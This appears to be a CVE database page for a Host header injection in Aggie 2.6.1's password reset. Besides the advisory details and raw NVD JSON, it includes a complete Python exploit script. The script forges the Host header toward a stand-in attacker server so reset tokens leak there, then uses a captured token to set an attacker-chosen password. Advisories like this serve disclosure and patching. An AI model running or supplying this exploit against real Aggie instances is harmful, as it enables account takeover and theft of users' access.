Security Vulnerability Report
CVE-2025-22381 CVSS 8.2 HIGH

Published: 2025-10-16 15:15:33
Last Modified: 2026-04-15 00:35:42

Description

Aggie 2.6.1 has a Host Header injection vulnerability in the forgot password functionality, allowing an attacker to reset a user's password.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Aggie < 2.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-22381 - Aggie 2.6.1 Host Header Injection PoC
# Vulnerability: Host Header Injection in forgot password functionality
# Impact: Attacker can reset any user's password by intercepting reset token

import requests

# Target configuration
target_url = "https://target-aggie-instance.com"
attacker_host = "attacker-controlled-server.com"
target_email = "[email protected]"

# Step 1: Send forgot password request with forged Host header
headers = {
    "Host": attacker_host,  # Forged Host header pointing to attacker's server
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Connection": "close"
}

# Payload for forgot password request
payload = {
    "email": target_email
}

# Send the malicious request
print(f"[*] Sending forged password reset request for: {target_email}")
response = requests.post(
    f"{target_url}/forgot-password",
    headers=headers,
    data=payload,
    allow_redirects=False
)

if response.status_code == 200 or response.status_code == 302:
    print("[+] Password reset request sent successfully")
    print(f"[*] The reset link will be generated using Host: {attacker_host}")
    print("[*] Victim will receive an email with a reset link pointing to attacker's server")
    print("[*] Attacker can capture the token and use it to reset victim's password")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Step 2: Attacker captures the reset token on their controlled server
# The reset link will look like:
# https://attacker-controlled-server.com/reset-password?token=CAPTURED_TOKEN

# Step 3: Attacker uses the captured token to reset victim's password
captured_token = "TOKEN_FROM_ATTACKER_SERVER"  # Replace with actual captured token
reset_url = f"{target_url}/reset-password"
reset_payload = {
    "token": captured_token,
    "password": "new_attacker_password_123",
    "password_confirmation": "new_attacker_password_123"
}

print(f"[*] Using captured token to reset password at: {reset_url}")
reset_response = requests.post(reset_url, data=reset_payload)

if reset_response.status_code == 200:
    print("[+] Password reset successful! Attacker now has access to victim's account")
else:
    print(f"[-] Password reset failed with status code: {reset_response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-22381", "sourceIdentifier": "[email protected]", "published": "2025-10-16T15:15:32.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Aggie 2.6.1 has a Host Header injection vulnerability in the forgot password functionality, allowing an attacker to reset a user's password."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-620"}]}], "references": [{"url": "https://github.com/TID-Lab/aggie/tree/a9d5becaff3ea90720ea7213c80825e253b8a730", "source": "[email protected]"}, {"url": "https://github.com/bugdotexe/Vulnerability-Research/tree/main/CVE-2025-22381", "source": "[email protected]"}, {"url": "https://github.com/pescada-dev/CVE-2025-22381", "source": "[email protected]"}]}}